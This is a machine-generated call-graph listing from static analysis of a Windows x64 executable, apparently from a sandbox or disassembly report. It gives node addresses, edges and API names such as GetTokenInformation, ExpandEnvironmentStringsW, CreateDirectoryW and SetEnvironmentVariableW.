7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 17103->17104 17107 7ff7b2b74a2d 17104->17107 17140 7ff7b2b72c10 17105->17140 17109 7ff7b2b6c550 _log10_special 8 API calls 17107->17109 17108 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17108->17107 17111 7ff7b2b629c3 17109->17111 17119 7ff7b2b75160 17111->17119 17112 7ff7b2b74af1 17116 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17112->17116 17113 7ff7b2b74b40 17115 7ff7b2b74b4a 17113->17115 17117 7ff7b2b74b1c 17113->17117 17114 7ff7b2b74ae8 17114->17112 17114->17117 17118 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17115->17118 17116->17107 17117->17108 17118->17107 17120 7ff7b2b7b2c8 _get_daylight 11 API calls 17119->17120 17121 7ff7b2b75177 17120->17121 17122 7ff7b2b629e5 17121->17122 17123 7ff7b2b7eb98 _get_daylight 11 API calls 17121->17123 17126 7ff7b2b751b7 17121->17126 17122->17063 17124 7ff7b2b751ac 17123->17124 17125 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17124->17125 17125->17126 17126->17122 17278 7ff7b2b7ec20 17126->17278 17129 7ff7b2b7a900 _isindst 17 API calls 17130 7ff7b2b751fc 17129->17130 17132 7ff7b2b6262f 17131->17132 17133 7ff7b2b69390 2 API calls 17132->17133 17134 7ff7b2b62660 17133->17134 17135 7ff7b2b62683 MessageBoxA 17134->17135 17136 7ff7b2b6266f MessageBoxW 17134->17136 17137 7ff7b2b62690 17135->17137 17136->17137 17138 7ff7b2b6c550 _log10_special 8 API calls 17137->17138 17139 7ff7b2b626a0 17138->17139 17139->17067 17141 7ff7b2b72c4e 17140->17141 17142 7ff7b2b72c3e 17140->17142 17143 7ff7b2b72c57 17141->17143 17150 7ff7b2b72c85 17141->17150 17146 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 17142->17146 17144 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 17143->17144 17145 7ff7b2b72c7d 17144->17145 17145->17112 17145->17113 17145->17114 17145->17117 17146->17145 17147 7ff7b2b747c0 45 API calls 17147->17150 17148 7ff7b2b72f34 17152 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 17148->17152 17150->17142 17150->17145 17150->17147 17150->17148 17154 7ff7b2b735a0 17150->17154 17180 7ff7b2b73268 17150->17180 17210 7ff7b2b72af0 17150->17210 17152->17142 17155 7ff7b2b73655 17154->17155 17156 7ff7b2b735e2 17154->17156 17157 7ff7b2b7365a 17155->17157 17158 7ff7b2b736af 17155->17158 17159 7ff7b2b735e8 17156->17159 17160 7ff7b2b7367f 17156->17160 17161 7ff7b2b7365c 17157->17161 17162 7ff7b2b7368f 17157->17162 17158->17160 17170 7ff7b2b736be 17158->17170 17178 7ff7b2b73618 17158->17178 17167 7ff7b2b735ed 17159->17167 17159->17170 17227 7ff7b2b71b50 17160->17227 17163 7ff7b2b735fd 17161->17163 17169 7ff7b2b7366b 17161->17169 17234 7ff7b2b71740 17162->17234 17179 7ff7b2b736ed 17163->17179 17213 7ff7b2b73f04 17163->17213 17167->17163 17168 7ff7b2b73630 17167->17168 17167->17178 17168->17179 17223 7ff7b2b743c0 17168->17223 17169->17160 17172 7ff7b2b73670 17169->17172 17170->17179 17241 7ff7b2b71f60 17170->17241 17175 7ff7b2b74558 37 API calls 17172->17175 17172->17179 17174 7ff7b2b6c550 _log10_special 8 API calls 17176 7ff7b2b73983 17174->17176 17175->17178 17176->17150 17178->17179 17248 7ff7b2b7e858 17178->17248 17179->17174 17181 7ff7b2b73289 17180->17181 17182 7ff7b2b73273 17180->17182 17183 7ff7b2b732c7 17181->17183 17186 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 17181->17186 17182->17183 17184 7ff7b2b73655 17182->17184 17185 7ff7b2b735e2 17182->17185 17183->17150 17187 7ff7b2b7365a 17184->17187 17188 7ff7b2b736af 17184->17188 17189 7ff7b2b735e8 17185->17189 17190 7ff7b2b7367f 17185->17190 17186->17183 17191 7ff7b2b7365c 17187->17191 17192 7ff7b2b7368f 17187->17192 17188->17190 17193 7ff7b2b736be 17188->17193 17208 7ff7b2b73618 17188->17208 17189->17193 17197 7ff7b2b735ed 17189->17197 17194 7ff7b2b71b50 38 API calls 17190->17194 17198 7ff7b2b7366b 17191->17198 17199 7ff7b2b735fd 17191->17199 17195 7ff7b2b71740 38 API calls 17192->17195 17201 7ff7b2b71f60 38 API calls 17193->17201 17209 7ff7b2b736ed 17193->17209 17194->17208 17195->17208 17196 7ff7b2b73f04 47 API calls 17196->17208 17197->17199 17200 7ff7b2b73630 17197->17200 17197->17208 17198->17190 17202 7ff7b2b73670 17198->17202 17199->17196 17199->17209 17203 7ff7b2b743c0 47 API calls 17200->17203 17200->17209 17201->17208 17205 7ff7b2b74558 37 API calls 17202->17205 17202->17209 17203->17208 17204 7ff7b2b6c550 _log10_special 8 API calls 17206 7ff7b2b73983 17204->17206 17205->17208 17206->17150 17207 7ff7b2b7e858 47 API calls 17207->17208 17208->17207 17208->17209 17209->17204 17261 7ff7b2b70d14 17210->17261 17214 7ff7b2b73f26 17213->17214 17215 7ff7b2b70b80 12 API calls 17214->17215 17216 7ff7b2b73f6e 17215->17216 17217 7ff7b2b7e570 46 API calls 17216->17217 17218 7ff7b2b74041 17217->17218 17219 7ff7b2b747c0 45 API calls 17218->17219 17221 7ff7b2b74063 17218->17221 17219->17221 17220 7ff7b2b747c0 45 API calls 17222 7ff7b2b740ec 17220->17222 17221->17220 17221->17221 17221->17222 17222->17178 17224 7ff7b2b743d8 17223->17224 17226 7ff7b2b74440 17223->17226 17225 7ff7b2b7e858 47 API calls 17224->17225 17224->17226 17225->17226 17226->17178 17228 7ff7b2b71b83 17227->17228 17229 7ff7b2b71bb2 17228->17229 17231 7ff7b2b71c6f 17228->17231 17230 7ff7b2b70b80 12 API calls 17229->17230 17233 7ff7b2b71bef 17229->17233 17230->17233 17232 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 17231->17232 17232->17233 17233->17178 17235 7ff7b2b71773 17234->17235 17236 7ff7b2b717a2 17235->17236 17238 7ff7b2b7185f 17235->17238 17237 7ff7b2b70b80 12 API calls 17236->17237 17240 7ff7b2b717df 17236->17240 17237->17240 17239 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 17238->17239 17239->17240 17240->17178 17242 7ff7b2b71f93 17241->17242 17243 7ff7b2b71fc2 17242->17243 17245 7ff7b2b7207f 17242->17245 17244 7ff7b2b70b80 12 API calls 17243->17244 17247 7ff7b2b71fff 17243->17247 17244->17247 17246 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 17245->17246 17246->17247 17247->17178 17249 7ff7b2b7e880 17248->17249 17250 7ff7b2b7e8c5 17249->17250 17251 7ff7b2b747c0 45 API calls 17249->17251 17254 7ff7b2b7e885 __scrt_get_show_window_mode 17249->17254 17257 7ff7b2b7e8ae __scrt_get_show_window_mode 17249->17257 17250->17254 17250->17257 17258 7ff7b2b807e8 17250->17258 17251->17250 17252 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 17252->17254 17254->17178 17257->17252 17257->17254 17260 7ff7b2b8080c WideCharToMultiByte 17258->17260 17262 7ff7b2b70d53 17261->17262 17263 7ff7b2b70d41 17261->17263 17265 7ff7b2b70d9d 17262->17265 17267 7ff7b2b70d60 17262->17267 17264 7ff7b2b74f08 _get_daylight 11 API calls 17263->17264 17266 7ff7b2b70d46 17264->17266 17270 7ff7b2b70e46 17265->17270 17272 7ff7b2b74f08 _get_daylight 11 API calls 17265->17272 17268 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 17266->17268 17269 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 17267->17269 17277 7ff7b2b70d51 17268->17277 17269->17277 17271 7ff7b2b74f08 _get_daylight 11 API calls 17270->17271 17270->17277 17274 7ff7b2b70ef0 17271->17274 17273 7ff7b2b70e3b 17272->17273 17275 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 17273->17275 17276 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 17274->17276 17275->17270 17276->17277 17277->17150 17281 7ff7b2b7ec3d 17278->17281 17279 7ff7b2b7ec42 17280 7ff7b2b74f08 _get_daylight 11 API calls 17279->17280 17283 7ff7b2b751dd 17279->17283 17286 7ff7b2b7ec4c 17280->17286 17281->17279 17281->17283 17284 7ff7b2b7ec8c 17281->17284 17282 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 17282->17283 17283->17122 17283->17129 17284->17283 17285 7ff7b2b74f08 _get_daylight 11 API calls 17284->17285 17285->17286 17286->17282 17288 7ff7b2b78258 17287->17288 17289 7ff7b2b78245 17287->17289 17297 7ff7b2b77ebc 17288->17297 17290 7ff7b2b74f08 _get_daylight 11 API calls 17289->17290 17293 7ff7b2b7824a 17290->17293 17294 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 17293->17294 17296 7ff7b2b78256 17294->17296 17296->16392 17304 7ff7b2b802d8 EnterCriticalSection 17297->17304 17306 7ff7b2b68633 __std_exception_copy 17305->17306 17307 7ff7b2b685b1 GetTokenInformation 17305->17307 17310 7ff7b2b6864c 17306->17310 17311 7ff7b2b68646 CloseHandle 17306->17311 17308 7ff7b2b685d2 GetLastError 17307->17308 17309 7ff7b2b685dd 17307->17309 17308->17306 17308->17309 17309->17306 17312 7ff7b2b685f9 GetTokenInformation 17309->17312 17310->16397 17311->17310 17312->17306 17313 7ff7b2b6861c 17312->17313 17313->17306 17314 7ff7b2b68626 ConvertSidToStringSidW 17313->17314 17314->17306 17316 7ff7b2b6c850 17315->17316 17317 7ff7b2b62b74 GetCurrentProcessId 17316->17317 17318 7ff7b2b626b0 48 API calls 17317->17318 17319 7ff7b2b62bc7 17318->17319 17320 7ff7b2b74bd8 48 API calls 17319->17320 17321 7ff7b2b62c10 MessageBoxW 17320->17321 17322 7ff7b2b6c550 _log10_special 8 API calls 17321->17322 17323 7ff7b2b62c40 17322->17323 17323->16408 17325 7ff7b2b625e5 17324->17325 17326 7ff7b2b74bd8 48 API calls 17325->17326 17327 7ff7b2b62604 17326->17327 17327->16422 17363 7ff7b2b78794 17328->17363 17332 7ff7b2b681dc 17331->17332 17333 7ff7b2b69390 2 API calls 17332->17333 17334 7ff7b2b681fb 17333->17334 17335 7ff7b2b68216 ExpandEnvironmentStringsW 17334->17335 17336 7ff7b2b68203 17334->17336 17338 7ff7b2b6823c __std_exception_copy 17335->17338 17337 7ff7b2b62810 49 API calls 17336->17337 17339 7ff7b2b6820f __std_exception_copy 17337->17339 17340 7ff7b2b68253 17338->17340 17341 7ff7b2b68240 17338->17341 17404 7ff7b2b81558 17363->17404 17463 7ff7b2b812d0 17404->17463 17603 7ff7b2b6456a 17602->17603 17604 7ff7b2b69390 2 API calls 17603->17604 17605 7ff7b2b6458f 17604->17605 17606 7ff7b2b6c550 _log10_special 8 API calls 17605->17606 17607 7ff7b2b645b7 17606->17607 17607->16460 17609 7ff7b2b67e2e 17608->17609 17610 7ff7b2b67f52 17609->17610 17611 7ff7b2b61c80 49 API calls 17609->17611 17612 7ff7b2b6c550 _log10_special 8 API calls 17610->17612 17615 7ff7b2b67eb5 17611->17615 17613 7ff7b2b67f83 17612->17613 17613->16460 17614 7ff7b2b61c80 49 API calls 17614->17615 17615->17610 17615->17614 17616 7ff7b2b64560 10 API calls 17615->17616 17617 7ff7b2b69390 2 API calls 17615->17617 17616->17615 17618 7ff7b2b67f23 CreateDirectoryW 17617->17618 17618->17610 17618->17615 17620 7ff7b2b61637 17619->17620 17621 7ff7b2b61613 17619->17621 17623 7ff7b2b645c0 108 API calls 17620->17623 17740 7ff7b2b61050 17621->17740 17625 7ff7b2b6164b 17623->17625 17624 7ff7b2b61618 17626 7ff7b2b6162e 17624->17626 17629 7ff7b2b62710 54 API calls 17624->17629 17627 7ff7b2b61653 17625->17627 17628 7ff7b2b61682 17625->17628 17626->16460 17630 7ff7b2b74f08 _get_daylight 11 API calls 17627->17630 17631 7ff7b2b645c0 108 API calls 17628->17631 17629->17626 17633 7ff7b2b61658 17630->17633 17632 7ff7b2b61696 17631->17632 17634 7ff7b2b6169e 17632->17634 17635 7ff7b2b616b8 17632->17635 17636 7ff7b2b62910 54 API calls 17633->17636 17637 7ff7b2b62710 54 API calls 17634->17637 17638 7ff7b2b706d4 73 API calls 17635->17638 17639 7ff7b2b61671 17636->17639 17640 7ff7b2b616ae 17637->17640 17641 7ff7b2b616cd 17638->17641 17639->16460 17644 7ff7b2b7004c 74 API calls 17640->17644 17668 7ff7b2b6718b 17667->17668 17670 7ff7b2b67144 17667->17670 17668->16460 17670->17668 17804 7ff7b2b75024 17670->17804 17672 7ff7b2b641a1 17671->17672 17673 7ff7b2b644e0 49 API calls 17672->17673 17674 7ff7b2b641db 17673->17674 17675 7ff7b2b644e0 49 API calls 17674->17675 17676 7ff7b2b641eb 17675->17676 17677 7ff7b2b6423c 17676->17677 17678 7ff7b2b6420d 17676->17678 17680 7ff7b2b64110 51 API calls 17677->17680 17835 7ff7b2b64110 17678->17835 17681 7ff7b2b6423a 17680->17681 17682 7ff7b2b6429c 17681->17682 17683 7ff7b2b64267 17681->17683 17716 7ff7b2b61c80 49 API calls 17715->17716 17717 7ff7b2b64474 17716->17717 17717->16460 17741 7ff7b2b645c0 108 API calls 17740->17741 17742 7ff7b2b6108c 17741->17742 17743 7ff7b2b610a9 17742->17743 17744 7ff7b2b61094 17742->17744 17746 7ff7b2b706d4 73 API calls 17743->17746 17745 7ff7b2b62710 54 API calls 17744->17745 17752 7ff7b2b610a4 __std_exception_copy 17745->17752 17747 7ff7b2b610bf 17746->17747 17748 7ff7b2b610c3 17747->17748 17749 7ff7b2b610e6 17747->17749 17750 7ff7b2b74f08 _get_daylight 11 API calls 17748->17750 17754 7ff7b2b610f7 17749->17754 17755 7ff7b2b61122 17749->17755 17752->17624 17805 7ff7b2b7505e 17804->17805 17806 7ff7b2b75031 17804->17806 17808 7ff7b2b75081 17805->17808 17811 7ff7b2b7509d 17805->17811 17807 7ff7b2b74fe8 17806->17807 17809 7ff7b2b74f08 _get_daylight 11 API calls 17806->17809 17807->17670 17810 7ff7b2b74f08 _get_daylight 11 API calls 17808->17810 17812 7ff7b2b7503b 17809->17812 17813 7ff7b2b75086 17810->17813 17819 7ff7b2b74f4c 17811->17819 17815 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 17812->17815 17816 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 17813->17816 17817 7ff7b2b75046 17815->17817 17818 7ff7b2b75091 17816->17818 17817->17670 17818->17670 17820 7ff7b2b74f6b 17819->17820 17821 7ff7b2b74f70 17819->17821 17820->17818 17821->17820 17822 7ff7b2b7b150 __CxxCallCatchBlock 45 API calls 17821->17822 17823 7ff7b2b74f8b 17822->17823 17827 7ff7b2b7d984 17823->17827 17828 7ff7b2b7d999 17827->17828 17830 7ff7b2b74fae 17827->17830 17828->17830 17836 7ff7b2b64136 17835->17836 17837 7ff7b2b74984 49 API calls 17836->17837 17900 7ff7b2b75ec8 17898->17900 17899 7ff7b2b75eee 17901 7ff7b2b74f08 _get_daylight 11 API calls 17899->17901 17900->17899 17902 7ff7b2b75f21 17900->17902 17903 7ff7b2b75ef3 17901->17903 17905 7ff7b2b75f27 17902->17905 17906 7ff7b2b75f34 17902->17906 17904 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 17903->17904 17907 7ff7b2b64616 17904->17907 17908 7ff7b2b74f08 _get_daylight 11 API calls 17905->17908 17917 7ff7b2b7ac28 17906->17917 17907->16485 17908->17907 17930 7ff7b2b802d8 EnterCriticalSection 17917->17930 18290 7ff7b2b778f8 18289->18290 18293 7ff7b2b773d4 18290->18293 18292 7ff7b2b77911 18292->16495 18294 7ff7b2b7741e 18293->18294 18295 7ff7b2b773ef 18293->18295 18303 7ff7b2b7546c EnterCriticalSection 18294->18303 18296 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 18295->18296 18298 7ff7b2b7740f 18296->18298 18298->18292 18305 7ff7b2b6fe43 18304->18305 18306 7ff7b2b6fe71 18304->18306 18307 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 18305->18307 18313 7ff7b2b6fe63 18306->18313 18314 7ff7b2b7546c EnterCriticalSection 18306->18314 18307->18313 18313->16499 18316 7ff7b2b645c0 108 API calls 18315->18316 18317 7ff7b2b61493 18316->18317 18318 7ff7b2b614bc 18317->18318 18319 7ff7b2b6149b 18317->18319 18321 7ff7b2b706d4 73 API calls 18318->18321 18320 7ff7b2b62710 54 API calls 18319->18320 18322 7ff7b2b614ab 18320->18322 18323 7ff7b2b614d1 18321->18323 18422 7ff7b2b66375 18421->18422 18423 7ff7b2b61c80 49 API calls 18422->18423 18424 7ff7b2b663b1 18423->18424 18425 7ff7b2b663dd 18424->18425 18426 7ff7b2b663ba 18424->18426 18428 7ff7b2b64630 49 API calls 18425->18428 18427 7ff7b2b62710 54 API calls 18426->18427 18429 7ff7b2b663d3 18427->18429 18430 7ff7b2b663f5 18428->18430 18434 7ff7b2b6c550 _log10_special 8 API calls 18429->18434 18431 7ff7b2b66413 18430->18431 18432 7ff7b2b62710 54 API calls 18430->18432 18433 7ff7b2b64560 10 API calls 18431->18433 18432->18431 18435 7ff7b2b6641d 18433->18435 18436 7ff7b2b6336e 18434->18436 18437 7ff7b2b6642b 18435->18437 18438 7ff7b2b68e80 3 API calls 18435->18438 18436->16599 18452 7ff7b2b66500 18436->18452 18438->18437 18711 7ff7b2b7b150 __CxxCallCatchBlock 45 API calls 18710->18711 18712 7ff7b2b7a3e1 18711->18712 18715 7ff7b2b7a504 18712->18715 18724 7ff7b2b83650 18715->18724 18750 7ff7b2b83608 18724->18750 18755 7ff7b2b802d8 EnterCriticalSection 18750->18755 18759 7ff7b2b808c8 18760 7ff7b2b808ec 18759->18760 18763 7ff7b2b808fc 18759->18763 18761 7ff7b2b74f08 _get_daylight 11 API calls 18760->18761 18783 7ff7b2b808f1 18761->18783 18762 7ff7b2b80bdc 18765 7ff7b2b74f08 _get_daylight 11 API calls 18762->18765 18763->18762 18764 7ff7b2b8091e 18763->18764 18766 7ff7b2b8093f 18764->18766 18890 7ff7b2b80f84 18764->18890 18767 7ff7b2b80be1 18765->18767 18770 7ff7b2b809b1 18766->18770 18772 7ff7b2b80965 18766->18772 18777 7ff7b2b809a5 18766->18777 18769 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18767->18769 18769->18783 18774 7ff7b2b7eb98 _get_daylight 11 API calls 18770->18774 18788 7ff7b2b80974 18770->18788 18771 7ff7b2b80a5e 18782 7ff7b2b80a7b 18771->18782 18789 7ff7b2b80acd 18771->18789 18905 7ff7b2b796c0 18772->18905 18778 7ff7b2b809c7 18774->18778 18776 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18776->18783 18777->18771 18777->18788 18911 7ff7b2b8712c 18777->18911 18784 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18778->18784 18780 7ff7b2b8098d 18780->18777 18791 7ff7b2b80f84 45 API calls 18780->18791 18781 7ff7b2b8096f 18786 7ff7b2b74f08 _get_daylight 11 API calls 18781->18786 18787 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18782->18787 18785 7ff7b2b809d5 18784->18785 18785->18777 18785->18788 18793 7ff7b2b7eb98 _get_daylight 11 API calls 18785->18793 18786->18788 18790 7ff7b2b80a84 18787->18790 18788->18776 18789->18788 18792 7ff7b2b833dc 40 API calls 18789->18792 18800 7ff7b2b80a89 18790->18800 18947 7ff7b2b833dc 18790->18947 18791->18777 18794 7ff7b2b80b0a 18792->18794 18795 7ff7b2b809f7 18793->18795 18796 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18794->18796 18798 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18795->18798 18799 7ff7b2b80b14 18796->18799 18798->18777 18799->18788 18799->18800 18801 7ff7b2b80bd0 18800->18801 18805 7ff7b2b7eb98 _get_daylight 11 API calls 18800->18805 18803 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18801->18803 18802 7ff7b2b80ab5 18804 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18802->18804 18803->18783 18804->18800 18806 7ff7b2b80b58 18805->18806 18807 7ff7b2b80b69 18806->18807 18808 7ff7b2b80b60 18806->18808 18810 7ff7b2b7a4a4 __std_exception_copy 37 API calls 18807->18810 18809 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18808->18809 18811 7ff7b2b80b67 18809->18811 18812 7ff7b2b80b78 18810->18812 18815 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18811->18815 18813 7ff7b2b80c0b 18812->18813 18814 7ff7b2b80b80 18812->18814 18817 7ff7b2b7a900 _isindst 17 API calls 18813->18817 18956 7ff7b2b87244 18814->18956 18815->18783 18818 7ff7b2b80c1f 18817->18818 18820 7ff7b2b80c48 18818->18820 18829 7ff7b2b80c58 18818->18829 18823 7ff7b2b74f08 _get_daylight 11 API calls 18820->18823 18821 7ff7b2b80bc8 18824 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18821->18824 18822 7ff7b2b80ba7 18825 7ff7b2b74f08 _get_daylight 11 API calls 18822->18825 18826 7ff7b2b80c4d 18823->18826 18824->18801 18827 7ff7b2b80bac 18825->18827 18830 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18827->18830 18828 7ff7b2b80f3b 18832 7ff7b2b74f08 _get_daylight 11 API calls 18828->18832 18829->18828 18831 7ff7b2b80c7a 18829->18831 18830->18811 18833 7ff7b2b80c97 18831->18833 18975 7ff7b2b8106c 18831->18975 18834 7ff7b2b80f40 18832->18834 18837 7ff7b2b80d0b 18833->18837 18839 7ff7b2b80cbf 18833->18839 18846 7ff7b2b80cff 18833->18846 18836 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18834->18836 18836->18826 18842 7ff7b2b7eb98 _get_daylight 11 API calls 18837->18842 18856 7ff7b2b80cce 18837->18856 18859 7ff7b2b80d33 18837->18859 18838 7ff7b2b80dbe 18850 7ff7b2b80ddb 18838->18850 18857 7ff7b2b80e2e 18838->18857 18990 7ff7b2b796fc 18839->18990 18847 7ff7b2b80d25 18842->18847 18844 7ff7b2b7eb98 _get_daylight 11 API calls 18851 7ff7b2b80d55 18844->18851 18845 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18845->18826 18846->18838 18846->18856 18996 7ff7b2b86fec 18846->18996 18852 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18847->18852 18848 7ff7b2b80cc9 18853 7ff7b2b74f08 _get_daylight 11 API calls 18848->18853 18849 7ff7b2b80ce7 18849->18846 18858 7ff7b2b8106c 45 API calls 18849->18858 18854 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18850->18854 18855 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18851->18855 18852->18859 18853->18856 18861 7ff7b2b80de4 18854->18861 18855->18846 18856->18845 18857->18856 18860 7ff7b2b833dc 40 API calls 18857->18860 18858->18846 18859->18844 18859->18846 18859->18856 18862 7ff7b2b80e6c 18860->18862 18864 7ff7b2b833dc 40 API calls 18861->18864 18866 7ff7b2b80dea 18861->18866 18863 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18862->18863 18865 7ff7b2b80e76 18863->18865 18868 7ff7b2b80e16 18864->18868 18865->18856 18865->18866 18867 7ff7b2b80f2f 18866->18867 18871 7ff7b2b7eb98 _get_daylight 11 API calls 18866->18871 18870 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18867->18870 18869 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18868->18869 18869->18866 18870->18826 18872 7ff7b2b80ebb 18871->18872 18873 7ff7b2b80ecc 18872->18873 18874 7ff7b2b80ec3 18872->18874 18876 7ff7b2b80474 37 API calls 18873->18876 18875 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18874->18875 18877 7ff7b2b80eca 18875->18877 18878 7ff7b2b80eda 18876->18878 18881 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18877->18881 18879 7ff7b2b80ee2 SetEnvironmentVariableW 18878->18879 18880 7ff7b2b80f6f 18878->18880 18882 7ff7b2b80f27 18879->18882 18883 7ff7b2b80f06 18879->18883 18884 7ff7b2b7a900 _isindst 17 API calls 18880->18884 18881->18826 18886 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18882->18886 18887 7ff7b2b74f08 _get_daylight 11 API calls 18883->18887 18885 7ff7b2b80f83 18884->18885 18886->18867 18888 7ff7b2b80f0b 18887->18888 18889 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18888->18889 18889->18877 18891 7ff7b2b80fb9 18890->18891 18892 7ff7b2b80fa1 18890->18892 18893 7ff7b2b7eb98 _get_daylight 11 API calls 18891->18893 18892->18766 18894 7ff7b2b80fdd 18893->18894 18895 7ff7b2b8103e 18894->18895 18899 7ff7b2b7eb98 _get_daylight 11 API calls 18894->18899 18900 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18894->18900 18901 7ff7b2b7a4a4 __std_exception_copy 37 API calls 18894->18901 18902 7ff7b2b8104d 18894->18902 18904 7ff7b2b81062 18894->18904 18897 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18895->18897 18896 7ff7b2b7a504 __CxxCallCatchBlock 45 API calls 18898 7ff7b2b81068 18896->18898 18897->18892 18899->18894 18900->18894 18901->18894 18903 7ff7b2b7a900 _isindst 17 API calls 18902->18903 18903->18904 18904->18896 18906 7ff7b2b796d9 18905->18906 18907 7ff7b2b796d0 18905->18907 18906->18780 18906->18781 18907->18906 19020 7ff7b2b79198 18907->19020 18912 7ff7b2b87139 18911->18912 18913 7ff7b2b86254 18911->18913 18914 7ff7b2b74f4c 45 API calls 18912->18914 18915 7ff7b2b86261 18913->18915 18917 7ff7b2b86297 18913->18917 18919 7ff7b2b8716d 18914->18919 18916 7ff7b2b74f08 _get_daylight 11 API calls 18915->18916 18935 7ff7b2b86208 18915->18935 18920 7ff7b2b8626b 18916->18920 18918 7ff7b2b862c1 18917->18918 18925 7ff7b2b862e6 18917->18925 18921 7ff7b2b74f08 _get_daylight 11 API calls 18918->18921 18922 7ff7b2b87172 18919->18922 18926 7ff7b2b87183 18919->18926 18927 7ff7b2b8719a 18919->18927 18923 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 18920->18923 18924 7ff7b2b862c6 18921->18924 18922->18777 18929 7ff7b2b86276 18923->18929 18930 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 18924->18930 18931 7ff7b2b74f4c 45 API calls 18925->18931 18936 7ff7b2b862d1 18925->18936 18928 7ff7b2b74f08 _get_daylight 11 API calls 18926->18928 18933 7ff7b2b871b6 18927->18933 18934 7ff7b2b871a4 18927->18934 18932 7ff7b2b87188 18928->18932 18929->18777 18930->18936 18931->18936 18937 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 18932->18937 18939 7ff7b2b871de 18933->18939 18940 7ff7b2b871c7 18933->18940 18938 7ff7b2b74f08 _get_daylight 11 API calls 18934->18938 18935->18777 18936->18777 18937->18922 18942 7ff7b2b871a9 18938->18942 19262 7ff7b2b88f4c 18939->19262 19253 7ff7b2b862a4 18940->19253 18945 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 18942->18945 18945->18922 18946 7ff7b2b74f08 _get_daylight 11 API calls 18946->18922 18948 7ff7b2b833fe 18947->18948 18949 7ff7b2b8341b 18947->18949 18948->18949 18950 7ff7b2b8340c 18948->18950 18951 7ff7b2b83425 18949->18951 19302 7ff7b2b87c38 18949->19302 18952 7ff7b2b74f08 _get_daylight 11 API calls 18950->18952 19309 7ff7b2b87c74 18951->19309 18955 7ff7b2b83411 __scrt_get_show_window_mode 18952->18955 18955->18802 18957 7ff7b2b74f4c 45 API calls 18956->18957 18958 7ff7b2b872aa 18957->18958 18959 7ff7b2b872b8 18958->18959 19321 7ff7b2b7ef24 18958->19321 19324 7ff7b2b754ac 18959->19324 18963 7ff7b2b873a4 18966 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18963->18966 18967 7ff7b2b873b5 18963->18967 18964 7ff7b2b74f4c 45 API calls 18965 7ff7b2b87327 18964->18965 18969 7ff7b2b7ef24 5 API calls 18965->18969 18972 7ff7b2b87330 18965->18972 18966->18967 18968 7ff7b2b80ba3 18967->18968 18970 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18967->18970 18968->18821 18968->18822 18969->18972 18970->18968 18971 7ff7b2b754ac 14 API calls 18973 7ff7b2b8738b 18971->18973 18972->18971 18973->18963 18974 7ff7b2b87393 SetEnvironmentVariableW 18973->18974 18974->18963 18976 7ff7b2b810ac 18975->18976 18983 7ff7b2b8108f 18975->18983 18976->18976 18977 7ff7b2b7eb98 _get_daylight 11 API calls 18976->18977 18985 7ff7b2b810d0 18977->18985 